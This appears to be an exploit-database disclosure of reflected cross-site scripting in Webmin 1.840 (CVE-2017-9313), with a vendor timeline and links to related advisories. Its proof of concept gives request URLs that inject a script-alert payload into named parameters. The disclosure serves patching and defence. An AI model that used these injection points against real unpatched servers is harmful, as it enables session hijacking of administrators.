Lucene search
Andy Tan1337DAY-ID-28075HistoryJul 04, 2017 - 12:00 a.m.
Webmin 1.840 Cross Site Scripting Vulnerability
2017-07-0400:00:00
Andy Tan
0day.today
27
EPSS
0.002
Percentile
59.5%
Exploit for cgi platform in category web applications
Vulnerability type: Reflected Cross Site Scripting
------------------------
Product: Webmin
------------------------
Affected version: Webmin 1.840 and possibly
earlier
------------------------
Patched version: Webmin 1.850
------------------------
Credit: Andy Tan
------------------------
CVE ID: CVE-2017-9313
------------------------
===============
Proof of Concept
================
Vulnerable Modules:
https://192.168.1.20:10000/man/view_man.cgi?page=foo&sec=<script>alert('xss')</script>
https://192.168.1.20:10000/webmin/change_referers.cgi?referer=0&referers=<script>alert('xss')</script>
https://192.168.1.20:10000/acl/save_user.cgi
(Vulnerable 'name' parameter)
Vendor contact timeline:
------------------------
2017-06-12: Contacted vendor.
2017-06-28: Vendor released new patch.
2017-07-02: Public disclosure.
# 0day.today [2018-03-06] #Related
cvelist
cvelist
CVE-2017-9313
2017-07-04 02:00:00
prion
prion
Cross site scripting
2017-07-04 02:29:00
openvas
openvas
Webmin Multiple XSS Vulnerabilities (Jul 2017) - Linux
2017-07-11 00:00:00
Webmin Multiple XSS Vulnerabilities (Jul 2017) - Windows
2017-07-11 00:00:00
packetstorm
packetstorm
Webmin 1.840 Cross Site Scripting
2017-07-03 00:00:00
nvd
nvd
CVE-2017-9313
2017-07-04 02:29:00
osv
osv
CVE-2017-9313
2017-07-04 02:29:00
nessus
nessus
Webmin < 1.850 Multiple Cross Site Scripting Vulnerabilities
2018-03-22 00:00:00
cve
cve
CVE-2017-9313
2017-07-04 02:29:00